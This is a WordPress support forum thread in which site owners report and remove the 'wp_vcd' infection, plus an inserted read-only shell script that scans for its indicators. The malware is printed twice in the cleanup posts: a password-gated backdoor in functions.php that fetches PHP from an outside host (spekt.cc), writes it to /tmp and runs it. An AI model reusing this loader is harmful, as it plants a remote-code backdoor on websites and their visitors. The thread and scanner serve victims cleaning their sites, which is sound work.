• hi, suddenly my WordPress gives an error: Parse error: syntax error, unexpected ‘<‘ in /tmp/theme_temp_setupb1fUKP on line 2

    i found lots of files in /tmp with filename theme_temp_setupxxxx

    and inside those files contained :

    <?php
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>www.verna.cc</title>
    <meta name="viewport" content="width=device-width" />
    </head>
    <body>
    </body>
    </html>

    am i hacked or?
    i can't find how to fix the problem since i don't know where the php files are located on my vps.

Viewing 15 replies - 1 through 15 (of 17 total)
  • Thread Starter pdku

    (@pdku)

    ok so i’ve been hacked!
    find this in wp-includes with file name class.wp.php <– delete this!

    next look into your functions.php remove all on top codes, and problem fixed!

    don't forget to change password.

    You need to start working your way through the resources on this page. I’d also suggest reviewing http://ottopress.com/2009/hacked-wordpress-backdoors/

    Anything less will probably result in the hacker walking straight back into your site again.

    Additional Resources:
    Hardening WordPress
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/

    Hi
    I have the same problem.
    Can you explain in detail the solve?
    @pdku


    encountered the same, file class.wp.php not. functions.php replaced by new but refuses to work

    The instruction has approached, many thanks!

    @benderoffspring I have the same problem.
    Can you explain in detail the solve?

    @ Uri70663

    wp-include with the file name class.wp.php <- remove it!

    file was not. reinstalled functions.php from the original theme and everything started

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Am I missing something obvious or are you still hacked? Someone or something has broken into your server and created a rogue file. You really need to consider looking at the sources Esmi posted.


    1. Rename your all theme
    2. Login your site
    3. Active akismet plugin (free)
    4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
    5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
    ————————————————————————–
    <?php

    if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
    {
    $div_code_name=”wp_vcd”;
    switch ($_REQUEST[‘action’])
    {

    case ‘change_domain’;
    if (isset($_REQUEST[‘newdomain’]))
    {

    if (!empty($_REQUEST[‘newdomain’]))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
    {

    $file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
    @file_put_contents(__FILE__, $file);
    print “true”;
    }

    }
    }
    }
    break;

    default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
    }

    die(“”);
    }

    if ( ! function_exists( ‘theme_temp_setup’ ) ) {
    $path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
    if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

    if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
    {

    function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    fwrite($handle, “<?php\n” . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    extract(theme_temp_setup($tmpcontent));
    }
    }
    }

    ?>
    ———————————————————————

    Thread Starter pdku

    (@pdku)

    @esmi @anevins yes im reviewing the link @esmi gave , thank you!

    and also remove all /tmp files with name theme_temp_setup

    @uri70663 @benderoffspring has made the point 😀

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Hey guys, just an etiquette thing. Please don’t @ folks who are already in the thread. If they want to subscribe, they will. If they chose not to, then using the @ sends unwanted emails. Thanks…. and back to having so much un-hacking fun!

    shakiltorj
    Thanks, it works for me.
    Can you say what needs to be done so that this type of attack is not repeated?
    thanks

    Some update
    a. Rename your all theme
    b. Login your site
    c. Active akismet plugin (free)
    d. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
    e. Go to wp-includes
    Delete the following file
    1. wp-feed
    2. wp-vcd.php
    3. class.wp.php
    f. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
    ————————————————————————–
    <?php

    if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
    {
    $div_code_name=”wp_vcd”;
    switch ($_REQUEST[‘action’])
    {

    case ‘change_domain’;
    if (isset($_REQUEST[‘newdomain’]))
    {

    if (!empty($_REQUEST[‘newdomain’]))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
    {

    $file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
    @file_put_contents(__FILE__, $file);
    print “true”;
    }

    }
    }
    }
    break;

    default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
    }

    die(“”);
    }

    if ( ! function_exists( ‘theme_temp_setup’ ) ) {
    $path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
    if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

    if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
    {

    function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    fwrite($handle, “<?php\n” . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    extract(theme_temp_setup($tmpcontent));
    }
    }
    }

    ?>
    ———————————————————————
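
A read-only scan for the indicators named in the posts above, for when you do not know where the files sit on the server. This is an added example, not part of any reply in the thread: the function names, output labels, the two directory arguments and the `wp-feed.*` pattern are assumptions; the file names and search strings are the ones quoted in the posts.

```shell
#!/bin/sh
# Added example, not from the thread. Read-only: it lists, never deletes.
# Usage: sh scan.sh /path/to/wordpress [/tmp]   (both paths are assumptions)

# Strings quoted in the posts above that appear in the injected loader.
MARKERS='theme_temp_setup|wp_vcd|code4\.php|ERROR_WP_ACTION'

scan_wpvcd() {
    root=$1
    tmpdir=${2:-/tmp}
    {
        # 1. Rogue files the posts report inside wp-includes.
        #    'wp-feed.*' is an assumption covering the name with an extension.
        find "$root" -type f -path '*/wp-includes/*' \
            \( -name 'class.wp.php' -o -name 'wp-vcd.php' \
               -o -name 'wp-feed' -o -name 'wp-feed.*' \) |
            sed 's/^/ROGUE_FILE /'

        # 2. Any PHP file (every theme's functions.php included) that
        #    still carries the loader strings.
        find "$root" -type f -name '*.php' \
            -exec grep -lE "$MARKERS" {} + |
            sed 's/^/INJECTED_CODE /'

        # 3. Leftover payload copies written by tempnam() in the temp dir.
        find "$tmpdir" -maxdepth 1 -type f -name 'theme_temp_setup*' |
            sed 's/^/TEMP_DROP /'
    } 2>/dev/null
}

# Exit status 0 only when nothing was reported.
wpvcd_is_clean() {
    [ -z "$(scan_wpvcd "$@")" ]
}

if [ "$#" -gt 0 ]; then
    scan_wpvcd "$@"
fi
```

Run it again after cleaning: a theme that is inactive but still present is reported too, since the scan covers every `.php` file under the WordPress root.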

    I was compromised with this as well.. Thanks for sharing your resolutions!

  • The topic ‘/tmp/theme_temp_setup what is this’ is closed to new replies.